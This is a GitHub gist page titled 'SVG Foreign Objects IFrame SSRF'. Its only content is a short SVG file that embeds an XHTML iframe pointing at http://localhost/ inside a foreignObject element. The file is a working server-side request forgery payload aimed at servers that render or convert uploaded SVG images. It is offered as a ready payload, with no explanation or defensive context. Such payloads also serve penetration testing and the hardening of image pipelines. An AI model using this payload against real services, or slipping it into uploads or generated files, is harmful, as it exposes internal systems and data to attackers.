Skip to content

Instantly share code, notes, and snippets.

@akhil-reni
Created April 4, 2019 11:17
Show Gist options
  • Star 12 You must be signed in to star a gist
  • Fork 4 You must be signed in to fork a gist
  • Save akhil-reni/5ed75c28a5406c300597431eafcdae2d to your computer and use it in GitHub Desktop.
Save akhil-reni/5ed75c28a5406c300597431eafcdae2d to your computer and use it in GitHub Desktop.
SVG Foreign Objects IFrame SSRF
Display the source blob
Display the rendered blob
Raw
<svg width="6000" height="6000">
<g>
<foreignObject width="6000" height="6000">
<body xmlns="http://www.w3.org/1999/xhtml">
<iframe src="http://localhost/"></iframe>
</body>
</foreignObject>
</g>
</svg>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment